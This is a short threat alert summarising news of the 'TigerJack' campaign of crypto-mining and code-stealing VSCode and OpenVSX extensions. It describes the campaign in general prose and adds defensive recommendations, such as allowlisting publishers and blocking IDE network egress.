Malicious Crypto-Stealing VSCode Extensions Resurface on OpenVSX
Category:Threat Alerts / Malware & Ransomware
BleepingComputer highlights a campaign by ‘TigerJack’ abusing VSCode and OpenVSX marketplaces. Removed extensions such as 'C++ Playground' and 'HTTP Format' reappear under new accounts. Payloads include near-real-time source exfiltration via onDidChangeTextDocument listeners and background CoinIMP crypto-mining. Another variant fetches and executes remote JavaScript every 20 minutes from a hardcoded URL, enabling arbitrary code execution without store updates. Because OpenVSX feeds popular VSCode-compatible editors (Cursor, Windsurf), the supply-chain exposure extends beyond Microsoft’s marketplace. Developers should treat third-party extensions as untrusted code.
CORTEX Protocol Intelligence Assessment
{"Business Impact":"Risk of source code theft, backdoors in builds, and workstation abuse for crypto-mining.","Technical Context":"Extension events used for exfiltration; remote JS fetched on schedule; multi-account republishing evades takedowns."}
Strategic Intelligence Guidance
- Establish allowlisted publishers; pin versions and checksum-verify extensions.
- Block network egress for IDEs by default; monitor suspicious extension behavior.
- Use sandboxed dev environments; rotate any exposed tokens/credentials.
- Prefer private extension registries for enterprise development.
Vendors
Threats
Targets
Impact
Financial:17,000 downloads (prior variants)
Intelligence Source: Malicious crypto-stealing VSCode extensions resurface on OpenVSX | Oct 15, 2025